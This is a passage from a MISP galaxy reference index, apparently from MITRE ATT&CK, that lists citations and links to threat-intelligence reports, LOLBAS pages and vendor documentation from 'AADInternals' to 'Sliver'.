Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="AADInternals zure AD Federated Domain"

Table 15325. Table References

Links

https://o365blog.com/post/federation-vulnerability/

Azure AD Federation Vulnerability

Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="Azure AD Federation Vulnerability"

Table 15326. Table References

Links

https://o365blog.com/post/federation-vulnerability/

ESET Sednit July 2015

ESET Research. (2015, July 10). Sednit APT Group Meets Hacking Team. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="ESET Sednit July 2015"

Table 15327. Table References

Links

http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/

ESET Sednit USBStealer 2014

Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.

The tag is: misp-galaxy:references="ESET Sednit USBStealer 2014"

Table 15328. Table References

Links

http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/

ESET Sednit 2017 Activity

ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="ESET Sednit 2017 Activity"

Table 15329. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

ESET Zebrocy Nov 2018

ESET. (2018, November 20). Sednit: What’s going on with Zebrocy? Retrieved February 12, 2019.

The tag is: misp-galaxy:references="ESET Zebrocy Nov 2018"

Table 15330. Table References

Links

https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/

Symantec MuddyWater Dec 2018

Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.

The tag is: misp-galaxy:references="Symantec MuddyWater Dec 2018"

Table 15331. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

SanDisk SMART

SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.

The tag is: misp-galaxy:references="SanDisk SMART"

SELinux official

SELinux Project. (2017, November 30). SELinux Project Wiki. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="SELinux official"

Table 15332. Table References

Links

https://selinuxproject.org/page/Main_Page

Microsoft SendNotifyMessage function

Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft SendNotifyMessage function"

Table 15333. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

DFIR Report Gootloader

The DFIR Report. (2022, May 9). SEO Poisoning – A Gootloader Story. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="DFIR Report Gootloader"

Table 15334. Table References

Links

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

MalwareBytes SEO

Arntz, P. (2018, May 29). SEO poisoning: Is it worth it? Retrieved September 30, 2022.

The tag is: misp-galaxy:references="MalwareBytes SEO"

Table 15335. Table References

Links

https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it

Sophos Attachment

Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Sophos Attachment"

Table 15336. Table References

Links

https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/

ProofPoint Serpent

Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.

The tag is: misp-galaxy:references="ProofPoint Serpent"

Table 15337. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Wikipedia Server Message Block

Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Wikipedia Server Message Block"

Table 15338. Table References

Links

https://en.wikipedia.org/wiki/Server_Message_Block

Wikipedia SMB

Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.

The tag is: misp-galaxy:references="Wikipedia SMB"

Table 15339. Table References

Links

https://en.wikipedia.org/wiki/Server_Message_Block

Proofpoint TA505 Jan 2019

Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Jan 2019"

Table 15340. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Kubernetes Service Accounts Security

Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Kubernetes Service Accounts Security"

Table 15341. Table References

Links

https://kubernetes.io/docs/concepts/security/service-accounts/

Microsoft Service Control Manager

Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Microsoft Service Control Manager"

Table 15342. Table References

Links

https://docs.microsoft.com/windows/win32/services/service-control-manager

Rapid7 Service Persistence 22JUNE2016

Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Rapid7 Service Persistence 22JUNE2016"

Table 15343. Table References

Links

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Microsoft SPN

Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Microsoft SPN"

Table 15344. Table References

Links

https://msdn.microsoft.com/library/ms677949.aspx

Microsoft SetSPN

Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Microsoft SetSPN"

Table 15345. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

Twitter Service Recovery Nov 2017

The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Twitter Service Recovery Nov 2017"

Table 15346. Table References

Links

https://twitter.com/r0wdy_/status/936365549553991680

Tweet Registry Perms Weakness

@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Tweet Registry Perms Weakness"

Table 15347. Table References

Links

https://twitter.com/r0wdy_/status/936365549553991680

TechNet Services

Microsoft. (n.d.). Services. Retrieved June 7, 2016.

The tag is: misp-galaxy:references="TechNet Services"

Table 15348. Table References

Links

https://technet.microsoft.com/en-us/library/cc772408.aspx

Krebs Access Brokers Fortune 500

Brian Krebs. (2012, October 22). Service Sells Access to Fortune 500 Firms. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Krebs Access Brokers Fortune 500"

Table 15349. Table References

Links

https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/

Medium Authentication Tokens

Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Medium Authentication Tokens"

Table 15350. Table References

Links

https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4

Microsoft Set-InboxRule

Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft Set-InboxRule"

Table 15351. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps

Setres.exe - LOLBAS Project

LOLBAS. (2022, October 21). Setres.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Setres.exe - LOLBAS Project"

Table 15352. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Setres/

Microsoft Process Wide Com Keys

Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft Process Wide Com Keys"

Table 15353. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

SettingSyncHost.exe - LOLBAS Project

LOLBAS. (2021, August 26). SettingSyncHost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="SettingSyncHost.exe - LOLBAS Project"

Table 15354. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/

Petri Logon Script AD

Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.

The tag is: misp-galaxy:references="Petri Logon Script AD"

Table 15355. Table References

Links

https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008

AWS Setting Up Run Command

AWS. (n.d.). Setting up Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AWS Setting Up Run Command"

Table 15356. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command-setting-up.html

VNC Authentication

Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="VNC Authentication"

Table 15357. Table References

Links

https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication

MacOS VNC software for Remote Desktop

Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="MacOS VNC software for Remote Desktop"

Table 15358. Table References

Links

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

Setupapi.dll - LOLBAS Project

LOLBAS. (2018, May 25). Setupapi.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Setupapi.dll - LOLBAS Project"

Table 15359. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Setupapi/

Microsoft Service Recovery Feb 2013

Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Microsoft Service Recovery Feb 2013"

Table 15360. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)

Microsoft SetWindowLong function

Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft SetWindowLong function"

Table 15361. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

Securelist ShadowPad Aug 2017

GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Securelist ShadowPad Aug 2017"

Table 15362. Table References

Links

https://securelist.com/shadowpad-in-corporate-networks/81432/

Kaspersky ShadowPad Aug 2017

Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.

The tag is: misp-galaxy:references="Kaspersky ShadowPad Aug 2017"

Table 15363. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf

Palo Alto Shamoon Nov 2016

Falcone, R. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="Palo Alto Shamoon Nov 2016"

Table 15364. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

Unit 42 Shamoon3 2018

Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Unit 42 Shamoon3 2018"

Table 15365. Table References

Links

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

McAfee Shamoon December19 2018

Roccia, T., Saavedra-Morales, J., Beek, C. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="McAfee Shamoon December19 2018"

Table 15366. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/

McAfee Shamoon December 2018

Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="McAfee Shamoon December 2018"

Table 15367. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/

TechNet Shared Folder

Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="TechNet Shared Folder"

Table 15368. Table References

Links

https://technet.microsoft.com/library/cc770880.aspx

AWS EBS Snapshot Sharing

Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="AWS EBS Snapshot Sharing"

Table 15369. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html

Linux Shared Libraries

Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Linux Shared Libraries"

Table 15370. Table References

Links

https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

TLDP Shared Libraries

The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.

The tag is: misp-galaxy:references="TLDP Shared Libraries"

Table 15371. Table References

Links

https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

Phrack halfdead 1997

halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Phrack halfdead 1997"

Table 15372. Table References

Links

http://phrack.org/issues/51/8.html

Wikipedia Shared Resource

Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Wikipedia Shared Resource"

Table 15373. Table References

Links

https://en.wikipedia.org/wiki/Shared_resource

Sharepoint Sharing Events

Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="Sharepoint Sharing Events"

Table 15374. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events

GitHub GhostPack Certificates

HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub GhostPack Certificates"

Table 15375. Table References

Links

https://github.com/GhostPack/SharpDPAPI#certificates

Shdocvw.dll - LOLBAS Project

LOLBAS. (2018, May 25). Shdocvw.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shdocvw.dll - LOLBAS Project"

Table 15376. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/

Securelist Turla Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 04). Shedding Skin – Turla’s Fresh Faces. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="Securelist Turla Oct 2018"

Table 15377. Table References

Links

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

Shell32.dll - LOLBAS Project

LOLBAS. (2018, May 25). Shell32.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shell32.dll - LOLBAS Project"

Table 15378. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shell32/

Cylance Shell Crew Feb 2017

Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.

The tag is: misp-galaxy:references="Cylance Shell Crew Feb 2017"

Table 15379. Table References

Links

https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

Magento

Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Magento"

Table 15380. Table References

Links

https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html

Trend Micro TA505 June 2019

Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Trend Micro TA505 June 2019"

Table 15381. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/

Shimgvw.dll - LOLBAS Project

LOLBAS. (2021, January 6). Shimgvw.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shimgvw.dll - LOLBAS Project"

Table 15382. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/

FireEye Shining A Light on DARKSIDE May 2021

FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="FireEye Shining A Light on DARKSIDE May 2021"

Table 15383. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

Telekom Security DarkGate August 25 2023

Fabian Marquardt. (2023, August 25). Shining some light on the DarkGate loader. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Telekom Security DarkGate August 25 2023"

Table 15384. Table References

Links

https://github.security.telekom.com/2023/08/darkgate-loader.html

NCC Group Black Basta June 2022

Inman, R. and Gurney, P. (2022, June 6). Shining the Light on Black Basta. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="NCC Group Black Basta June 2022"

Table 15385. Table References

Links

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

Trustwave Cherry Picker

Merritt, E. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Trustwave Cherry Picker"

Table 15386. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/

Shlayer jamf gatekeeper bypass 2021

Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Shlayer jamf gatekeeper bypass 2021"

Table 15387. Table References

Links

https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/

Shodan

Shodan. (n.d.). Shodan. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Shodan"

Table 15388. Table References

Links

https://shodan.io

Shortcut for Persistence

Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Shortcut for Persistence"

Table 15389. Table References

Links

https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence

Unprotect Shortcut

Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Unprotect Shortcut"

Table 15390. Table References

Links

https://unprotect.it/technique/shortcut-hiding/

Sleep, shut down, hibernate

AVG. (n.d.). Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop? Retrieved June 8, 2023.

The tag is: misp-galaxy:references="Sleep, shut down, hibernate"

Table 15391. Table References

Links

https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop

show_clock_detail_cisco_cmd

Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_clock_detail_cisco_cmd"

Table 15392. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674

show_processes_cisco_cmd

Cisco. (2022, August 16). show processes. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_processes_cisco_cmd"

Table 15393. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760

show_run_config_cmd_cisco

Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_run_config_cmd_cisco"

Table 15394. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733

Symantec Shuckworm January 2022

Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Symantec Shuckworm January 2022"

Table 15395. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

Microsoft Shutdown Oct 2017

Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Shutdown Oct 2017"

Table 15396. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

MalwareBytes SideCopy Dec 2021

Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.

The tag is: misp-galaxy:references="MalwareBytes SideCopy Dec 2021"

Table 15397. Table References

Links

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Rewterz Sidewinder APT April 2020

Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Rewterz Sidewinder APT April 2020"

Table 15398. Table References

Links

https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis

Cyble Sidewinder September 2020

Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Cyble Sidewinder September 2020"

Table 15399. Table References

Links

https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/

Microsoft Sigcheck May 2017

Russinovich, M. et al. (2017, May 22). Sigcheck. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="Microsoft Sigcheck May 2017"

Table 15400. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sigcheck

Linux Signal Man

Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.

The tag is: misp-galaxy:references="Linux Signal Man"

Table 15401. Table References

Links

https://man7.org/linux/man-pages/man7/signal.7.html

f-secure janicab

Brod. (2013, July 15). Signed Mac Malware Using Right-to-Left Override Trick. Retrieved July 17, 2017.

The tag is: misp-galaxy:references="f-secure janicab"

Table 15402. Table References

Links

https://www.f-secure.com/weblog/archives/00002576.html

Group IB Silence Aug 2019

Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Group IB Silence Aug 2019"

Table 15403. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

SecureList Silence Nov 2017

GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="SecureList Silence Nov 2017"

Table 15404. Table References

Links

https://securelist.com/the-silence/83009/

Cyber Forensicator Silence Jan 2019

Skulkin, O. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Cyber Forensicator Silence Jan 2019"

Table 15405. Table References

Links

https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/

Group IB Silence Sept 2018

Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Group IB Silence Sept 2018"

Table 15406. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf

CrowdStrike Silent Chollima Adversary September 2021

CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike Silent Chollima Adversary September 2021"

Table 15407. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/

Malwarebytes Silent Librarian October 2020

Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Malwarebytes Silent Librarian October 2020"

Table 15408. Table References

Links

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

Phish Labs Silent Librarian

Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Phish Labs Silent Librarian"

Table 15409. Table References

Links

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

GitHub SILENTTRINITY Modules July 2019

Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022.

The tag is: misp-galaxy:references="GitHub SILENTTRINITY Modules July 2019"

Table 15410. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo

Unit 42 Siloscape Jun 2021

Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.

The tag is: misp-galaxy:references="Unit 42 Siloscape Jun 2021"

Table 15411. Table References

Links

https://unit42.paloaltonetworks.com/siloscape/

Unit42 SilverTerrier 2016

Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit42 SilverTerrier 2016"

Table 15412. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

Unit42 SilverTerrier 2018

Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit42 SilverTerrier 2018"

Table 15413. Table References

Links

https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise

Timac DYLD_INSERT_LIBRARIES

Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="Timac DYLD_INSERT_LIBRARIES"

Table 15414. Table References

Links

https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/

SIM Swapping and Abuse of the Microsoft Azure Serial Console

Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="SIM Swapping and Abuse of the Microsoft Azure Serial Console"

Table 15415. Table References

Links

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

EduardosBlog SIPs July 2008

Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="EduardosBlog SIPs July 2008"

Table 15416. Table References

Links

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

Anonymous Hackers Deface Russian Govt Site

Andy. (2018, May 12). ‘Anonymous’ Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Anonymous Hackers Deface Russian Govt Site"

Table 15417. Table References

Links

https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/

Dell Skeleton

Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.

The tag is: misp-galaxy:references="Dell Skeleton"

Table 15418. Table References

Links

https://www.secureworks.com/research/skeleton-key-malware-analysis

Command Five SK 2011

Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Command Five SK 2011"

Table 15419. Table References

Links

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

Trend Micro Skidmap

Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Trend Micro Skidmap"

Table 15420. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

Detectify Slack Tokens

Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Detectify Slack Tokens"

Table 15421. Table References

Links

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

GitHub Sliver C2

BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="GitHub Sliver C2"

Table 15422. Table References

Links

https://github.com/BishopFox/sliver/

GitHub Sliver C2 DNS

BishopFox. (n.d.). Sliver DNS C2. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="GitHub Sliver C2 DNS"

Table 15423. Table References

Links

https://github.com/BishopFox/sliver/wiki/DNS-C2

GitHub Sliver Download

BishopFox. (n.d.). Sliver Download. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Download"

Table 15424. Table References

Links

https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/command/filesystem/download.go

GitHub Sliver File System August 2021

BishopFox. (2021, August 18). Sliver Filesystem. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="GitHub Sliver File System August 2021"

Table 15425. Table References

Links

https://github.com/BishopFox/sliver/tree/master/client/command/filesystem

GitHub Sliver HTTP

BishopFox. (n.d.). Sliver HTTP(S) C2. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver HTTP"

Table 15426. Table References

Links

https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2

GitHub Sliver Ifconfig

BishopFox. (n.d.). Sliver Ifconfig. Retrieved September 16, 2021.

